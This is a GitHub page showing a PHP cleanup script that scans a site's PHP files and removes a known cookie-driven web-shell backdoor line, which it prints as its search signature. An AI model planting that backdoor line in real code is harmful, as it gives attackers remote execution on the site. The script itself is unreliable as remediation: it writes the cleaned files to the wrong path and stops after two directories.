-
Notifications
You must be signed in to change notification settings - Fork 2
/
cut_infected_code.php
executable file
·60 lines (56 loc) · 2.14 KB
/
cut_infected_code.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?header('Content-Type: text/html; charset=utf-8');
$script_name = basename(__FILE__);
if($handle = opendir('../')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && !strpos($file, '.zip')) {
$all_directory[] = $file;
}
}
closedir($handle);
}
sort($all_directory);
$i = 0;
foreach($all_directory as $directory){
if($handle = opendir('../'.$directory)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && strpos($file, '.php') && $file != $script_name) {
$code = file_get_contents('../'.$directory.'/'.$file);
$code = htmlspecialchars($code);
$clear_code = check_code($code);
try{
if($code != $clear_code){
if(!file_put_contents($file, $clear_code))
throw new Exception("Не удалось записать в файл >>> $directory/$file");
else
throw new Exception("Вредоносный код вырезан из файла >>> $directory/$file");
}
}catch (Exception $e) {
$msg = date('d.m.Y H:i:s').' -- '.$e->getMessage()."\n";
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/check_log.txt', $msg, FILE_APPEND);
}
}
}
closedir($handle);
}
$i++;
echo $i;
if($i == 2) break;
}
function check_code($code){
$find = false;
$needle = htmlentities('if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);');
if(strpos($code, $needle)){
$code = str_replace($needle , "", $code);
$find = true;
}
$needle = htmlentities('<?php');
$replacement = htmlentities('<?');
if(is_integer(strpos($code, $needle))){
$code = str_replace($needle , $replacement, $code);
$find = true;
}
if($find) $code = html_entity_decode($code);
return $code;
}
echo 'Лог работы скрипта сохранен в файл - '.$_SERVER['DOCUMENT_ROOT'].'/check_log.txt';
?>